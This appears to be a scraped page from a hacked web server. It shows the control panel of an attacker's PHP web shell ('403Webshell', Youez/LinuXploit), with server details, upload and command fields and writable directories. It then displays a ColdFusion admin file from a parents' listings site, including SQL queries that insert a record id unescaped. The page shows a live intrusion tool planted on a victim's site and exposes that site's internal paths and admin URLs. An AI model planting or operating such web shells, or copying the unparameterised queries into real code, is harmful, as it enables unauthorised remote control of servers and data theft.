403Webshell
Server IP : 104.21.21.239  /  Your IP : 216.73.216.11
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/home2/cgny/nympadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/home2/cgny/nympadmin/1rdms.cfm
<cfquery name="Getl" datasource="#ds#">
    select * from ParentsListings where (advertiser = 1 or advertiser = 4 or advertiser = 2) and delflag = 0 and hide = 0
</cfquery>

<table border="1" cellpadding="4" cellspacing="0">
<cfoutput query="getl">
<TR bgcolor="#IIf(CurrentRow Mod 2, DE('ffffff'), DE('efefef'))#">
    
<td>
    
    <cfif advertiser eq 1>
        Premium
        <Cfelseif advertiser eq 4>
            Premium Lite Directional
        <cfelseif advertiser eq 2>
         Premium Plus Directory 
    </cfif>
    
</td>    
    
<Td>
    <Cfquery name="checkdir" datasource="#ds#">
        
        select writeupreceieved from issueguide where pkid = #getl.id#
    order by id desc
    </Cfquery>
    
 <a href="https://admin.nymetroparents.com/listingseditpk.cfm?id=#id#&table=ParentsListings&cat=Adoption&catid=106">   #name#</a> </td>
    
    <td>
    <cfif #checkdir.recordcount# eq 0>
      MISSING<br>
      <cfelse>
      #checkdir.writeupreceieved#<br>
    </cfif>
    </td>
    </tr>
</cfoutput>

</table>

Youez - 2016 - github.com/yon3zu
LinuXploit